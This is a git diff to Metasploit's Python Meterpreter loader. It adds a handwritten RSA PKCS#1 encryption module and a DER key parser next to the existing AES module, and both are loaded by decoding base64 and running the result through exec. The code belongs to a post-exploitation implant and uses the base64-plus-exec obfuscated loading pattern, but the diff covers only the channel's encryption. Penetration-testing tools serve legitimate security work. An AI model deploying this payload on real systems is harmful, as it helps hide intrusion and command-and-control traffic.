diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 80524e9058..cba4aa1fdc 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -145,13 +145,19 @@ module Payload::Python::MeterpreterLoader end def python_encryptor_loader - encryptor = Rex::Text.encode_base64(python_encryptor_source) + aes_encryptor = Rex::Text.encode_base64(python_aes_source) + rsa_encryptor = Rex::Text.encode_base64(python_rsa_source) %Q? import codecs,imp,base64 met_aes = imp.new_module('met_aes') -exec(compile(base64.b64decode(codecs.getencoder('utf-8')('#{encryptor}')[0]),'','exec'), met_aes.__dict__) +met_rsa = imp.new_module('met_rsa') +exec(compile(base64.b64decode(codecs.getencoder('utf-8')('#{aes_encryptor}')[0]),'','exec'), met_aes.__dict__) +exec(compile(base64.b64decode(codecs.getencoder('utf-8')('#{rsa_encryptor}')[0]),'','exec'), met_rsa.__dict__) sys.modules['met_aes'] = met_aes -import met_aes +sys.modules['met_rsa'] = met_rsa +import met_rsa, met_aes +def met_rsa_encrypt(der, msg): + return met_rsa.rsa_enc(der, msg) def met_aes_encrypt(key, iv, pt): return met_aes.AESCBC(key).encrypt(iv, pt) def met_aes_decrypt(key, iv, pt): @@ -159,7 +165,68 @@ def met_aes_decrypt(key, iv, pt): ? end - def python_encryptor_source + def python_rsa_source + %Q? +import struct as s, base64 as b, sys, math, random, binascii, os +is2 = sys.version_info[0] < 3 +def bt(b): + if is2: + return b + return ord(b) +def b2i(b): + if is2: + return int(b.encode('hex'), 16) + return int.from_bytes(b, byteorder='big') +def i2b(i): + h='{0:x}'.format(i) + if len(h)%2==1: + h = '0'+h + return binascii.unhexlify(h) +def rs(a, o): + if a[o] == bt(b'\\x81'): + return (s.unpack('B', a[o+1])[0], 2 + o) + elif a[o] == bt(b'\\x82'): + return (s.unpack('>H', a[o+1:o+3])[0], 3 + o) +def ri(b, o): + i, o = rs(b, o) + return (b[o:o+i], o+i) +def b2me(b): + if b[0] != bt(b'\\x30'): + return (None, None) + _, o = rs(b, 1) + if b[o] != bt(b'\\x02'): + return (None, None) + (m, o) = ri(b, o + 1) + if b[o] != bt(b'\\x02'): + return (None, None) + e = b[o+2:] + return (b2i(m), b2i(e)) +def der2me(d): + if d[0] != bt(b'\\x30'): + return (None, None) + _, o = rs(d, 1) + while o < len(d): + if d[o] == bt(b'\\x30'): + o += s.unpack('B', d[o+1:o+2])[0] + elif d[o] == bt(b'\\x05'): + o += 2 + elif d[o] == bt(b'\\x03'): + _, o = rs(d, o + 1) + return b2me(d[o + 1:]) + else: + return (None, None) +def rsa_enc(der, msg): + m, e = der2me(der) + h=b'\\x00\\x02' + d=b'\\00' + #p=os.urandom(256-len(h)-len(msg)-len(d)) + l=256-len(h)-len(msg)-len(d) + p=os.urandom(512).replace(b'\\x00',b'') + return i2b(pow(b2i(h+p[:l]+d+msg), e, m)) +? + end + + def python_aes_source %Q? import copy,struct,sys def chunks(lst, n): @@ -282,7 +349,7 @@ class AESCBC(object): raise ValueError('ciphertext block must be 16 bytes') cb=_s2b(ct);pt=[(p^l)for(p,l)in zip(self.dec_in(cb),self._lcb)];self._lcb=cb return _b2s(pt) - ? +? end end